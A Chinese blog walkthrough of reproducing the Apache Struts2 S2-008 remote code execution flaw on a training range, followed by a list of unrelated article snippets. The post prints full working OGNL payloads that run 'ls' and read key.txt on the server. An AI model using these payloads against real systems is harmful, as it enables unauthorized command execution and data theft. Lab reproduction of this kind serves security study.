Yolo山药
Yolo山药

Apache Struts2远程代码执行漏洞(S2-008)

漏洞原因

主要是利用对传入参数没有严格限制,导致多个地方可以执行恶意代码,传入?debug=command&expression=即可执行OGNL表达式,Cookie 拦截器错误配置可造成 OGNL 表达式执行

复现

靶机墨者学院

Apache Struts2远程代码执行漏洞(S2-008)_第1张图片
构造poc,执行命令ls,查看文件。

构造poc,执行命令ls,查看文件。
?debug=command&expression=%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23_memberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23_memberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22ls%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()

?debug=command&expression=%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23_memberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23_memberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22ls%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()

Apache Struts2远程代码执行漏洞(S2-008)_第2张图片

修改poc,执行cat key.txt 查找key文件

?debug=command&expression=%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23_memberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23_memberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22cat%27%2C%27.%2Fkey.txt%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()

在谷歌和火狐浏览器都返回null。。。抓包都不能返回,希望有大佬能解答

最后还是用工具k8一键日了

你可能感兴趣的:(Struts2漏洞复现,apache,struts,安全)

  • localhost 已拒绝连接。 滚菩提哦呢 服务器网络linux运维
    "localhost已拒绝连接"是一个计算机网络错误提示,表示你的本地计算机尝试连接到本地服务器上的某个应用程序,但连接被服务器拒绝了。这种错误通常出现在以下几种情况下:服务器没有启动或者应用程序没有在服务器上运行。服务器上的应用程序正在使用不同的端口,而你尝试连接的端口不正确。防火墙或其他安全软件阻止了你的连接。你输入的URL有误,无法正确识别要连接的服务器。解决此问题的方法包括检查服务器是否启
  • Android Retrofit 框架注解定义与解析模块深度剖析(一) &有梦想的咸鱼& AndroidRetrofit原理androidretrofit
    一、引言在现代Android和Java开发中,网络请求是不可或缺的一部分。Retrofit作为Square公司开源的一款强大的类型安全的HTTP客户端,凭借其简洁易用的API和高效的性能,在开发者社区中广受欢迎。Retrofit的核心特性之一便是通过注解来定义HTTP请求,这种方式使得代码更加清晰、易读且易于维护。本文将深入Retrofit框架的源码,对其注解定义与解析模块进行全面且细致的分析,揭
  • 【Java】中Maven依赖详解 God Zhang Maven算法javamaven
    14天阅读挑战赛一、maven概念maven是Apache下的一个纯Java开发的开源项目。基于项目对象模型(缩写:POM)概念,Maven利用一小段描述信息管理一个项目的构件。Maven是一个项目管理工具,可以对Java项目进行构建以及对依赖进行管理。二、Maven环境安装1、maven官方网站http://maven.apache.org/下载apache-maven-3.5.0-bin.zi
  • InnoDB和MyISAM bobo306 mysql-面试题mysql数据库java
    InnoDB和MyISAM是使用MySQL时最常用的两种引擎类型,我们重点来看下两者区别。事务和外键InnoDB支持事务和外键,具有安全性和完整性,适合大量insert或update操作MyISAM不支持事务和外键,它提供高速存储和检索,适合大量的select查询操作锁机制InnoDB支持行级锁,锁定指定记录。基于索引来加锁实现。MyISAM支持表级锁,锁定整张表。索引结构InnoDB使用聚集索引
  • 面向对象的三大特性? 毛小茛 Java面试知识点java
    面向对象的三大特性?封装定义与目的将数据和操作这些数据的方法绑定在一起,形成一个类,并通过访问控制机制限制外部对类内部数据和方法的直接访问。保护数据的安全性和完整性,避免外部代码随意修改内部数据,同时提高代码的可维护性和可扩展性。实现方法使用访问修饰符(如private、protected、public)来控制类成员的访问权限访问修饰符谁可以访问private类自身protected类自身+子类p
  • phoenix无法连接hbase shell创建表失败_报错_PleaseHoldException: Master is initializing---记录020_大数据工作笔记0180 添柴程序猿 hbase连接报错phoenix连接hbasephoenixPleaseHoldExcep
    今天发现,我的phoenix,去连接hbase集群,怎么也连不上了,奇怪了...弄了一晚上org.apache.hadoop.hbase.PleaseHoldException:Masterisinitializing[root@hadoop120bin]#ll总用量184-rwxr-xr-x.1rootroot36371月222020chaos-daemon.sh-rwxr-xr-x.1root
  • 智能化工具助力施工安全监测:开启高效、精准的安全管理新时代 inscode_046
    智能化工具助力施工安全监测:开启高效、精准的安全管理新时代最新接入DeepSeek-V3模型,点击下载最新版本InsCodeAIIDE引言在建筑行业中,施工安全一直是重中之重。随着科技的飞速发展,智能化工具的应用为施工安全监测带来了前所未有的变革。通过引入先进的AI技术,施工安全管理不仅变得更加高效和精准,还能显著降低事故发生率。本文将探讨如何利用智能化工具提升施工安全监测水平,并介绍一款能够极大
  • 1433抓鸡工具_1433抓鸡工具在软件安全测试中的重要性及应用 网络安全(king) 网络工程师网络安全黑客web安全网络安全前端服务器
    在信息安全领域,“1433抓鸡工具”这一术语往往与网络安全测试紧密相关。虽然名字听起来有些戏谑,但这类工具在软件安全评估和渗透测试中扮演着重要角色。本文将从软考的角度出发,探讨1433抓鸡工具的基本概念、使用场景及其在软件安全中的作用。一、1433抓鸡工具概述1433抓鸡工具,通常指的是一类网络安全测试工具,用于检测网络系统中的潜在漏洞。这类工具能够模拟黑客的攻击行为,帮助安全专家发现系统可能存在
  • 计算机视觉|3D 点云处理黑科技:PointNet++ 原理剖析与实战指南 紫雾凌寒 AI炼金厂#深度学习#计算机视觉深度学习计算机视觉3dcnnPointNet++3d云3d云数据
    一、引言在当今数字化与智能化快速发展的时代,3D点云处理技术在多个前沿领域中发挥着重要作用。特别是在自动驾驶和机器人视觉等领域,这项技术已成为实现智能化的关键支撑。以自动驾驶为例,车辆需要实时感知周围复杂的环境信息,包括行人、车辆、交通标志和路况等。3D点云数据能够提供高精度的三维空间信息,使自动驾驶车辆更准确地识别和定位周围物体,从而做出安全、合理的行驶决策。在城市街道上,自动驾驶车辆通过3D点
  • 基于java的搜索引擎系统设计与实现 助力毕业 搜索引擎java数据库
    基于java的搜索引擎系统设计与实现I.引言A.研究背景和动机基于Java的搜索引擎系统设计与实现的研究背景和动机是构建一个高效、准确、安全的搜索引擎系统。随着互联网的普及,搜索引擎已经成为了人们获取信息的主要方式之一。但是,现有的搜索引擎系统还存在一些问题,比如搜索结果的准确性、搜索速度的快慢、搜索结果的可靠性等。为了解决这些问题,需要开发一个高效、准确、安全的搜索引擎系统。本文将介绍基于Jav
  • Android 加解密算法工具类封装:AES、RSA、MD5 一站式解决方案 tangweiguo03051987 android算法AESDESMD5JAVA
    在Android开发中,数据的安全性非常重要,尤其是敏感数据的存储和传输。为了实现数据加密和解密,我们可以封装一个通用的加解密工具类,支持常见的加密算法(如AES、RSA、DES等)。以下是一个基于AES对称加密算法的工具类封装示例,同时提供扩展性以支持其他算法。AES加解密工具类封装AES(AdvancedEncryptionStandard)是一种对称加密算法,加密和解密使用相同的密钥。以下是
  • 鸿蒙全栈开发 D2 GH小杨 harmonyos华为
    课程目标掌握ArkTS基础语法与核心概念理解声明式UI开发范式能独立开发简单鸿蒙应用组件建立规范的代码编写习惯第一部分:初识ArkTS1.1语言全景认知JavaScriptTypeScriptArkTS鸿蒙生态手机平板智能穿戴关键特征解析:类型安全:编译时检查错误(演示类型错误案例)UI即代码:通过代码直接描述界面(对比传统XML布局)一次开发:同一套代码适配不同设备尺寸1.2开发环境初体验Dev
  • 氢能源汽车使用过程中的氢气监测技术:量子电导氢气传感器的引领 德克西尔DrKsir 氢气传感器能源汽车
    一、引言随着氢能源汽车的不断发展,其安全性成为人们关注的焦点。氢气作为一种易燃易爆的气体,其在车辆内部和外部的浓度监测至关重要。本文将探讨车辆使用过程中氢气水平监测的技术手段,特别是量子电导氢气传感器的应用,以及系统架构和实际应用案例,旨在确保在任何使用条件下都能保持安全。二、氢气监测的重要性氢燃料电池汽车以其高效、环保的特点成为未来汽车发展的重要方向。然而,氢气的易燃易爆特性使得对其浓度的实时监
  • Synology 部署的 WordPress 無法升級至最新版本時,可以透過以下改良版指南進行排查和解決。 蠟筆小新工程師 synologywordpress
    當Synology部署的WordPress無法升級至最新版本時,可以透過以下改良版指南進行排查和解決。我對內容進行了補充和重新組織,希望能幫助你更高效地處理這類問題:權限相關問題處理檢查文件和目錄權限:確保WordPress安裝目錄內的目錄權限設置為755,文件權限設置為664。特殊文件wp-config.php權限應設置為600,以加強安全性。可以使用以下命令在終端中修改:bashchmod-R
  • Python 入 黑客KKKing 网络安全计算机网络工程师网络web安全安全
    Python入侵交换机随着网络安全威胁不断增加,对于网络设备的安全防护变得愈发重要。而交换机作为网络中重要的设备之一,也需要加强安全保护。本文将介绍如何利用Python来入侵交换机,并对其进行漏洞扫描和安全检测。1.Python入侵交换机原理Python作为一种强大的编程语言,可以用来编写各种网络安全工具。通过Python,我们可以实现与交换机进行通信,并对其进行扫描和测试。通过编写相应的脚本,可
  • 基于SpringBoot的智能问诊系统设计与隐私保护策略 大熊计算机 技术博文springboot后端java
    通过SpringBoot框架,我们可以快速搭建一个智能问诊系统,为用户提供便捷的线上医疗服务。然而,在系统设计和实现过程中,如何保障用户的隐私和数据安全,始终是一个亟需关注的问题。本文将探讨基于SpringBoot的智能问诊系统的设计原理、开发实践及隐私保护策略。1.智能问诊系统概述智能问诊系统是基于人工智能、数据分析及信息技术等手段,通过网络平台为用户提供医疗咨询、初步诊断、健康管理等服务的系统
  • 读书报告」网络安全防御实战--蓝军武器库 ailx10 web安全测试工具网络安全
    一眨眼,20天过去了,刷完了这本书「网络安全防御实战--蓝军武器库」,回味无穷,整理概览如下,可共同交流读书心得。在阅读本书的过程中,我深刻感受到网络安全防御是一个综合性、复杂性极高的领域。蓝军需要掌握各种攻击手段的技术特点和防御方法,并在实践中不断积累经验和优化防御策略。本书作者深入浅出地讲解了各种攻击手段和防御方法,结合实战案例和工具技术的使用,使读者能够更加深入地理解和掌握网络安全防御的要点
  • 网络安全中蓝牙攻击有哪些? Hacker_Nightrain web安全网络安全
    在现代生活中,蓝牙技术的应用已经非常普及,无论是生活还是工作蓝牙都为我们带来了诸多便利。正因如此,它与其他技术一样,蓝牙通信也经常遭遇网络攻击,那么什么是蓝牙攻击?常见种类有哪些?我们来看看具体内容介绍。蓝牙攻击是指黑客或攻击利用蓝牙技术中的漏洞或弱点,通过各种手段未经授权地获取或干扰目标设备的信息、功能或控制权的行为。蓝牙攻击可以采取多种形式,包括但不限于以下几种:1、蓝牙监听:攻击者通过监听蓝
  • Nanobrowser:开源版OpenAI Operator!AI自动操控浏览器,复杂网页任务一键搞定 蚝油菜花 每日AI项目与应用实例人工智能开源
    ❤️如果你也关注AI的发展现状,且对AI应用开发感兴趣,我会每日分享大模型与AI领域的开源项目和应用,提供运行实例和实用教程,帮助你快速上手AI技术!AI在线答疑->智能检索历史文章和开源项目->尽在微信公众号->搜一搜:蚝油菜花「打工人速救!这个AI神器让浏览器自动干活:爬数据/抢优惠全托管,本地运行更安全」大家好,我是蚝油菜花。你是否经历过——深夜盯屏幕手动抓数据,复制粘贴到手抽筋秒杀活动总是
  • 亚矩阵云手机+SafetyNet:虚拟化设备的安全通行证破解应用兼容性难题 云机矩阵西奥 安全矩阵数据结构硬件架构网络安全科技服务器
    SafetyNet是谷歌为Android设备设计的安全检测框架,主要用于验证设备完整性、防止恶意攻击,并确保应用运行在可信环境中。其核心功能包括:设备完整性检测:检查设备是否被Root、系统是否被篡改(如非官方ROM或解锁BootLoader)。应用认证:确保应用仅在安全环境中运行,例如通过CTSProfileMatch验证设备是否符合Google兼容性要求。恶意软件防护:动态检测并拦截潜在的恶意
  • 2025最新Linux系统深度优化指南:20个核心技巧与实战案例解析 emmm形成中 linux应用实操服务器linuxgithub
    2025最新Linux系统深度优化指南:20个核心技巧与实战案例解析摘要:随着Linux在云计算、大数据、AI等领域的广泛应用,系统性能优化成为运维工程师的核心技能。本文结合2025年最新实践案例,从内核调优、资源管理、安全加固到云原生适配,全面解析Linux系统优化的20项核心技术,助力企业打造高性能、高可用的服务器环境。一、Linux系统优化的重要性与趋势在数字化转型加速的背景下,Linux系
  • deepseek 本地搭建的好处是什么 rockmelodies pythondeepseekai大模型本地搭建
    在本地搭建DeepSeek(或类似AI模型/工具)的主要好处体现在以下几个方面,尤其适合对数据隐私、定制化需求或长期成本控制有较高要求的企业或组织:数据隐私与安全敏感数据保护:数据完全存储在本地,无需上传至第三方服务器,避免传输或云端存储过程中的泄露风险,尤其适合金融、医疗、法律等涉及敏感信息的行业。合规性:满足GDPR、HIPAA或国内《数据安全法》等法规对数据本地化存储的要求,避免跨境传输的法
  • Spring Cloud Gateway 笔记 L_!!! SpringCloud笔记springcloudgateway
    SpringCloudGateway笔记简介SpringCloudGateway是基于Spring5、SpringBoot2和ProjectReactor的API网关,提供动态路由、安全、监控和弹性等功能。核心特性:异步非阻塞模型、高性能、支持动态配置、丰富的断言(Predicate)和过滤器(Filter)。官网:https://spring.io/projects/spring-cloud-g
  • 2025年入职/转行网络安全,该如何规划?网络安全职业规划 教网络安全的毛老师 web安全安全网络运维云计算
    网络安全是一个日益增长的行业,对于打算进入或转行进入该领域的人来说,制定一个清晰且系统的职业规划非常重要。2025年,网络安全领域将继续发展并面临新的挑战,包括不断变化的技术、法规要求以及日益复杂的威胁环境。以下是一个关于网络安全职业规划的详细指南,涵盖了从入门到高级岗位的成长路径、技能要求、资源获取等方面的内容。第一部分:网络安全行业概述1.1网络安全的现状与未来网络安全已经成为全球企业和政府的
  • FTP 与 TFTP 的详细异同点 忧虑的乌龟蛋 记录网络tftp计网ftp端口号应用层network
    文章目录前言一、协议对比FTP(FileTransferProtocol)TFTP(TrivialFileTransferProtocol)二、异同点对比三、详细分析3.1协议类型3.2功能3.3用户认证3.4使用场景3.5安全性3.6传输速度四、适用场景FTP的适用场景TFTP的适用场景前言在网络文件传输协议中,FTP(FileTransferProtocol)和TFTP(TrivialFile
  • claude 3.5 官网国内怎么使用!1分钟教你在国内轻松驾驭claude 3.5 claude
    ClaudeAI:开启智能助理新纪元——更安全、更亲和、更强大在人工智能领域日新月异的今天,由Anthropic公司倾力打造的ClaudeAI,正以其卓越的性能和独特的理念,迅速在全球范围内吸引了AI爱好者和专业人士的目光。Claude不仅仅是一款功能强大的智能助手,更是一款以安全性和符合人类价值观为核心设计原则的产品,致力于为用户带来更安全、更友善、更高效的AI体验。Claude采用了一种名为“
  • 避坑指南:chatgpt账号购买成品号- chatgpt 4.0 plus成品号购买手册! openai
    购买ChatGPT账号的注意事项及指南✨在当前人工智能技术快速发展的背景下,ChatGPT作为一种强大的语言模型工具️,受到了广泛关注。然而,在获取ChatGPT账号的过程中,用户需审慎考虑多项关键因素,以确保所购账号的安全、可靠及合法性✅,规避潜在风险⚠️。本文将深入探讨购买ChatGPT账号时需重点关注的几个方面,并提供相关建议。1.账号来源审查️‍♂️账号来源是决定其安全性和可靠性的首要因素
  • 影视会员接口api对接过程中需要注意什么事项? 绝缘体1 pygame大数据pandas网络运维
    在对接影视会员API接口的过程中,需要注意以下几个关键事项,以确保集成过程顺利且安全:1.了解API接口API功能:明确API接口的功能,如会员权益查询、影片库访问、会员价格获取等。接口文档:详细阅读API文档,了解请求参数、请求方法、请求URL、响应格式及可能的错误代码。2.对接前的准备工作注册账号:在API服务提供商的平台上注册开发者账号,并获取APIKey和Secret,这些信息将用于接口的
  • datagrid数据及echarts图表导出到Excel 飞舞花下
    导包:org.apache.poipoi3.9org.apache.poipoi-ooxml3.9org.apache.poipoi-scratchpad3.9jsp页面中datagrid显示的数据及echarts图表显示的代码(包含在form表单中),算了,还是贴上整个jsp算了。统计分析行政区划:示范评级:导出查询清空/***系统页面加载后初始化处理.*/$(function(){$("tab
  • 阿里云个人博客外网访问中断应急指南:从安全组到日志的七步排查法 云心雨禅 云服务器操作教程阿里云安全云计算网络
    1.检查安全组配置确认已开放外网访问的端口(如HTTP80或HTTPS443),包括入方向和出方向规则。操作指南:登录阿里云控制台→选择云服务器ECS→进入安全组配置→添加规则允许目标端口,授权对象设置为0.0.0.0/0。2.检查本地防火墙确保服务器防火墙未阻止外部流量。Windows环境:在防火墙高级设置中启用HTTP或HTTPS入站规则,或手动添加端口例外。Linux环境:运行sudoipt
  • 安装数据库首次应用 Array_06 javaoraclesql
    可是为什么再一次失败之后就变成直接跳过那个要求 enter full pathname of java.exe的界面 这个java.exe是你的Oracle 11g安装目录中例如:【F:\app\chen\product\11.2.0\dbhome_1\jdk\jre\bin】下的java.exe 。不是你的电脑安装的java jdk下的java.exe! 注意第一次,使用SQL D
  • Weblogic Server Console密码修改和遗忘解决方法 bijian1013 Welogic
            在工作中一同事将Weblogic的console的密码忘记了,通过网上查询资料解决,实践整理了一下。 一.修改Console密码         打开weblogic控制台,安全领域 --> myrealm -->&n
  • IllegalStateException: Cannot forward a response that is already committed Cwind javaServlets
    对于初学者来说,一个常见的误解是:当调用 forward() 或者 sendRedirect() 时控制流将会自动跳出原函数。标题所示错误通常是基于此误解而引起的。 示例代码: protected void doPost() { if (someCondition) { sendRedirect(); } forward(); // Thi
  • 基于流的装饰设计模式 木zi_鸣 设计模式
    当想要对已有类的对象进行功能增强时,可以定义一个类,将已有对象传入,基于已有的功能,并提供加强功能。 自定义的类成为装饰类 模仿BufferedReader,对Reader进行包装,体现装饰设计模式 装饰类通常会通过构造方法接受被装饰的对象,并基于被装饰的对象功能,提供更强的功能。 装饰模式比继承灵活,避免继承臃肿,降低了类与类之间的关系 装饰类因为增强已有对象,具备的功能该
  • Linux中的uniq命令 被触发 linux
    Linux命令uniq的作用是过滤重复部分显示文件内容,这个命令读取输入文件,并比较相邻的行。在正常情 况下,第二个及以后更多个重复行将被删去,行比较是根据所用字符集的排序序列进行的。该命令加工后的结果写到输出文件中。输入文件和输出文件必须不同。如 果输入文件用“- ”表示,则从标准输入读取。 AD: uniq [选项] 文件 说明:这个命令读取输入文件,并比较相邻的行。在正常情况下,第二个
  • 正则表达式Pattern 肆无忌惮_ Pattern
    正则表达式是符合一定规则的表达式,用来专门操作字符串,对字符创进行匹配,切割,替换,获取。   例如,我们需要对QQ号码格式进行检验 规则是长度6~12位  不能0开头  只能是数字,我们可以一位一位进行比较,利用parseLong进行判断,或者是用正则表达式来匹配[1-9][0-9]{4,14} 或者 [1-9]\d{4,14} &nbs
  • Oracle高级查询之OVER (PARTITION BY ..) 知了ing oraclesql
    一、rank()/dense_rank() over(partition by ...order by ...) 现在客户有这样一个需求,查询每个部门工资最高的雇员的信息,相信有一定oracle应用知识的同学都能写出下面的SQL语句: select e.ename, e.job, e.sal, e.deptno from scott.emp e, (se
  • Python调试 矮蛋蛋 pythonpdb
    原文地址: http://blog.csdn.net/xuyuefei1988/article/details/19399137 1、下面网上收罗的资料初学者应该够用了,但对比IBM的Python 代码调试技巧: IBM:包括 pdb 模块、利用 PyDev 和 Eclipse 集成进行调试、PyCharm 以及 Debug 日志进行调试: http://www.ibm.com/d
  • webservice传递自定义对象时函数为空,以及boolean不对应的问题 alleni123 webservice
    今天在客户端调用方法 NodeStatus status=iservice.getNodeStatus(). 结果NodeStatus的属性都是null。 进行debug之后,发现服务器端返回的确实是有值的对象。 后来发现原来是因为在客户端,NodeStatus的setter全部被我删除了。 本来是因为逻辑上不需要在客户端使用setter, 结果改了之后竟然不能获取带属性值的
  • java如何干掉指针,又如何巧妙的通过引用来操作指针————>说的就是java指针 百合不是茶
    C语言的强大在于可以直接操作指针的地址,通过改变指针的地址指向来达到更改地址的目的,又是由于c语言的指针过于强大,初学者很难掌握, java的出现解决了c,c++中指针的问题 java将指针封装在底层,开发人员是不能够去操作指针的地址,但是可以通过引用来间接的操作:   定义一个指针p来指向a的地址(&是地址符号):        
  • Eclipse打不开,提示“An error has occurred.See the log file ***/.log” bijian1013 eclipse
    打开eclipse工作目录的\.metadata\.log文件,发现如下错误: !ENTRY org.eclipse.osgi 4 0 2012-09-10 09:28:57.139 !MESSAGE Application error !STACK 1 java.lang.NoClassDefFoundError: org/eclipse/core/resources/IContai
  • spring aop实例annotation方法实现 bijian1013 javaspringAOPannotation
            在spring aop实例中我们通过配置xml文件来实现AOP,这里学习使用annotation来实现,使用annotation其实就是指明具体的aspect,pointcut和advice。1.申明一个切面(用一个类来实现)在这个切面里,包括了advice和pointcut AdviceMethods.jav
  • [Velocity一]Velocity语法基础入门 bit1129 velocity
    用户和开发人员参考文档 http://velocity.apache.org/engine/releases/velocity-1.7/developer-guide.html   注释 1.行级注释## 2.多行注释#*  *#   变量定义 使用$开头的字符串是变量定义,例如$var1, $var2,   赋值 使用#set为变量赋值,例
  • 【Kafka十一】关于Kafka的副本管理 bit1129 kafka
    1. 关于request.required.acks   request.required.acks控制者Producer写请求的什么时候可以确认写成功,默认是0, 0表示即不进行确认即返回。 1表示Leader写成功即返回,此时还没有进行写数据同步到其它Follower Partition中 -1表示根据指定的最少Partition确认后才返回,这个在   Th
  • lua统计nginx内部变量数据 ronin47 lua nginx  统计
    server { listen 80; server_name photo.domain.com; location /{set $str $uri; content_by_lua ' local url = ngx.var.uri local res = ngx.location.capture(
  • java-11.二叉树中节点的最大距离 bylijinnan java
    import java.util.ArrayList; import java.util.List; public class MaxLenInBinTree { /* a. 1 / \ 2 3 / \ / \ 4 5 6 7 max=4 pass "root"
  • Netty源码学习-ReadTimeoutHandler bylijinnan javanetty
    ReadTimeoutHandler的实现思路: 开启一个定时任务,如果在指定时间内没有接收到消息,则抛出ReadTimeoutException 这个异常的捕获,在开发中,交给跟在ReadTimeoutHandler后面的ChannelHandler,例如 private final ChannelHandler timeoutHandler = new ReadTim
  • jquery验证上传文件样式及大小(好用) cngolon 文件上传jquery验证
    <!DOCTYPE html> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <script src="jquery1.8/jquery-1.8.0.
  • 浏览器兼容【转】 cuishikuan css浏览器IE
    浏览器兼容问题一:不同浏览器的标签默认的外补丁和内补丁不同 问题症状:随便写几个标签,不加样式控制的情况下,各自的margin 和padding差异较大。 碰到频率:100% 解决方案:CSS里    *{margin:0;padding:0;} 备注:这个是最常见的也是最易解决的一个浏览器兼容性问题,几乎所有的CSS文件开头都会用通配符*来设
  • Shell特殊变量:Shell $0, $#, $*, $@, $?, $$和命令行参数 daizj shell$#$?特殊变量
    前面已经讲到,变量名只能包含数字、字母和下划线,因为某些包含其他字符的变量有特殊含义,这样的变量被称为特殊变量。例如,$ 表示当前Shell进程的ID,即pid,看下面的代码: $echo $$ 运行结果 29949   特殊变量列表 变量 含义 $0 当前脚本的文件名 $n 传递给脚本或函数的参数。n 是一个数字,表示第几个参数。例如,第一个
  • 程序设计KISS 原则-------KEEP IT SIMPLE, STUPID! dcj3sjt126com unix
    翻到一本书,讲到编程一般原则是kiss:Keep It Simple, Stupid.对这个原则深有体会,其实不仅编程如此,而且系统架构也是如此。 KEEP IT SIMPLE, STUPID! 编写只做一件事情,并且要做好的程序;编写可以在一起工作的程序,编写处理文本流的程序,因为这是通用的接口。这就是UNIX哲学.所有的哲学真 正的浓缩为一个铁一样的定律,高明的工程师的神圣的“KISS 原
  • android Activity间List传值 dcj3sjt126com Activity
    第一个Activity: import java.util.ArrayList;import java.util.HashMap;import java.util.List;import java.util.Map;import android.app.Activity;import android.content.Intent;import android.os.Bundle;import a
  • tomcat 设置java虚拟机内存 eksliang tomcat 内存设置
    转载请出自出处:http://eksliang.iteye.com/blog/2117772 http://eksliang.iteye.com/ 常见的内存溢出有以下两种: java.lang.OutOfMemoryError: PermGen space java.lang.OutOfMemoryError: Java heap space   ------------
  • Android 数据库事务处理 gqdy365 android
    使用SQLiteDatabase的beginTransaction()方法可以开启一个事务,程序执行到endTransaction() 方法时会检查事务的标志是否为成功,如果程序执行到endTransaction()之前调用了setTransactionSuccessful() 方法设置事务的标志为成功则提交事务,如果没有调用setTransactionSuccessful() 方法则回滚事务。事
  • Java 打开浏览器 hw1287789687 打开网址open浏览器open browser打开url打开浏览器
    使用java 语言如何打开浏览器呢? 我们先研究下在cmd窗口中,如何打开网址 使用IE 打开 D:\software\bin>cmd /c start iexplore http://hw1287789687.iteye.com/blog/2153709 使用火狐打开 D:\software\bin>cmd /c start firefox http://hw1287789
  • ReplaceGoogleCDN:将 Google CDN 替换为国内的 Chrome 插件 justjavac chromeGooglegoogle apichrome插件
    Chrome Web Store 安装地址: https://chrome.google.com/webstore/detail/replace-google-cdn/kpampjmfiopfpkkepbllemkibefkiice 由于众所周知的原因,只需替换一个域名就可以继续使用Google提供的前端公共库了。 同样,通过script标记引用这些资源,让网站访问速度瞬间提速吧
  • 进程VS.线程 m635674608 线程
    资料来源: http://www.liaoxuefeng.com/wiki/001374738125095c955c1e6d8bb493182103fac9270762a000/001397567993007df355a3394da48f0bf14960f0c78753f000 1、Apache最早就是采用多进程模式 2、IIS服务器默认采用多线程模式 3、多进程优缺点 优点: 多进程模式最大
  • Linux下安装MemCached 字符串 memcached
    前提准备:1. MemCached目前最新版本为:1.4.22,可以从官网下载到。2. MemCached依赖libevent,因此在安装MemCached之前需要先安装libevent。2.1 运行下面命令,查看系统是否已安装libevent。[root@SecurityCheck ~]# rpm -qa|grep libevent libevent-headers-1.4.13-4.el6.n
  • java设计模式之--jdk动态代理(实现aop编程) Supanccy2013 javaDAO设计模式AOP
        与静态代理类对照的是动态代理类,动态代理类的字节码在程序运行时由Java反射机制动态生成,无需程序员手工编写它的源代码。动态代理类不仅简化了编程工作,而且提高了软件系统的可扩展性,因为Java 反射机制可以生成任意类型的动态代理类。java.lang.reflect 包中的Proxy类和InvocationHandler 接口提供了生成动态代理类的能力。 &
  • Spring 4.2新特性-对java8默认方法(default method)定义Bean的支持 wiselyman spring 4
    2.1 默认方法(default method) java8引入了一个default medthod; 用来扩展已有的接口,在对已有接口的使用不产生任何影响的情况下,添加扩展 使用default关键字 Spring 4.2支持加载在默认方法里声明的bean 2.2 将要被声明成bean的类 public class DemoService {
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他